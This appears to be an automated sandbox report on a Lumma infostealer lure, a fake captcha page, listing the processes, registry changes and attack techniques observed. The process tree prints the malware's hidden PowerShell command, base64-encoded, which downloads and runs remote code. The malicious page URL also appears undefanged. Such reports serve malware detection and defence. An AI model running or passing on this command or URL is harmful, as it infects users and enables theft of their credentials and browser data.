lumma | hxxps://pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/CAptcha-Verifications-Approval[.]html

Resubmissions

05/10/2024, 20:46

241005-zksbaascjn 8

05/10/2024, 20:46

05/10/2024, 20:44

05/10/2024, 20:43

05/10/2024, 17:42

Analysis

max time kernel
53s
max time network
49s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05/10/2024, 20:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/CAptcha-Verifications-Approval.html

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Family

lumma

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma

Blocklisted process makes network request 2 IoCs

flow	pid	Process
50	540	PowerShell.exe
54	540	PowerShell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
540	PowerShell.exe

Executes dropped EXE 2 IoCs

pid	Process
5744	Setup.exe
5976	StrCmp.exe

Loads dropped DLL 15 IoCs

pid	Process
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5744 set thread context of 5196	5744	Setup.exe	116

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	StrCmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchIndexer.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\ = "cBluetoothDaemon"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\ = "cBluetoothDaemon"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ProxyStubClsid32	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\TypeLib	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\TypeLib\ = "{F477A542-C370-42A1-A166-F9CDAF2AF8C6}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BtDaemon.cBluetoothDaemon\ = "BtDaemon.cBluetoothDaemon"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}\ = "cBluetoothDaemon"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ = "cBluetoothDaemon"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\Programmable	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\LocalServer32	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\FLAGS\ = "0"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ = "__cBluetoothDaemon"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\VERSION\ = "2.1"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BtDaemon.cBluetoothDaemon\Clsid\ = "{4F7FA487-8CC1-493E-AF0A-E7A294474F25}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\ProxyStubClsid	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\Forward	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\0	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\0\win32\ = "C:\\ProgramData\\pprotect\\PNDRCMKZFVOG\\StrCmp.exe"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ = "__cBluetoothDaemon"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\VERSION	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\ProxyStubClsid	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\FLAGS	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BtDaemon.cBluetoothDaemon\Clsid	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\TypeLib\ = "{F477A542-C370-42A1-A166-F9CDAF2AF8C6}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\TypeLib\Version = "2.1"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\TypeLib	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\TypeLib\ = "{F477A542-C370-42A1-A166-F9CDAF2AF8C6}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\HELPDIR	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\TypeLib	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\ProgID	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BtDaemon.cBluetoothDaemon	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\ProxyStubClsid\ = "{00020420-0000-0000-C000-000000000046}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\Forward\ = "{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ProxyStubClsid\ = "{00020420-0000-0000-C000-000000000046}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\ = "_cBluetoothDaemon"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\TypeLib\Version = "2.1"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\ProxyStubClsid32	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}\ProxyStubClsid	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\TypeLib	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}\LocalServer32\ = "C:\\ProgramData\\pprotect\\PNDRCMKZFVOG\\StrCmp.exe"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}\ProxyStubClsid32	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{10E6A3D4-CABA-4E61-BD8B-83BA76283791}\ProxyStubClsid32	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4F7FA487-8CC1-493E-AF0A-E7A294474F25}	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8A84C003-E3A6-4E71-8E33-5B929D40B81D}\Forward\ = "{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}"	StrCmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\0\win32	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F477A542-C370-42A1-A166-F9CDAF2AF8C6}\2.1\HELPDIR\ = "C:\\ProgramData\\pprotect\\PNDRCMKZFVOG"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\TypeLib\ = "{F477A542-C370-42A1-A166-F9CDAF2AF8C6}"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{65B9560F-CEC2-4DFC-A04D-BEA488DA4DCC}\TypeLib\Version = "2.1"	StrCmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5965C4C-9CC3-4EA3-8079-0B9AA9389A1F}\TypeLib\ = "{F477A542-C370-42A1-A166-F9CDAF2AF8C6}"	StrCmp.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3220	msedge.exe
3220	msedge.exe
4908	msedge.exe
4908	msedge.exe
1824	identity_helper.exe
1824	identity_helper.exe
540	PowerShell.exe
540	PowerShell.exe
540	PowerShell.exe
5744	Setup.exe
5744	Setup.exe
5744	Setup.exe
5196	more.com
5196	more.com
5196	more.com
5196	more.com

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
5744	Setup.exe
5196	more.com

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	540	PowerShell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe
4908	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5976	StrCmp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4908 wrote to memory of 1052	4908	msedge.exe	82
PID 4908 wrote to memory of 1052	4908	msedge.exe	82
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 4484	4908	msedge.exe	83
PID 4908 wrote to memory of 3220	4908	msedge.exe	84
PID 4908 wrote to memory of 3220	4908	msedge.exe	84
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85
PID 4908 wrote to memory of 5040	4908	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/CAptcha-Verifications-Approval.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8aded46f8,0x7ff8aded4708,0x7ff8aded4718
  2⤵
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
  2⤵
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:2124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:712
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 /prefetch:8
  2⤵
  PID:4116
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4988 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
  2⤵
  PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:5320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
  2⤵
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,74691238179874270,14930516766154637198,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:6012

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1632

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:224

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540
- C:\Users\Admin\AppData\Local\Temp\file\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\file\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:5744
- - C:\ProgramData\pprotect\PNDRCMKZFVOG\StrCmp.exe
    C:\ProgramData\pprotect\PNDRCMKZFVOG\StrCmp.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:5976
- - C:\Windows\SysWOW64\more.com
    C:\Windows\SysWOW64\more.com
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:5196
  - - C:\Windows\SysWOW64\SearchIndexer.exe
      C:\Windows\SysWOW64\SearchIndexer.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:2984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

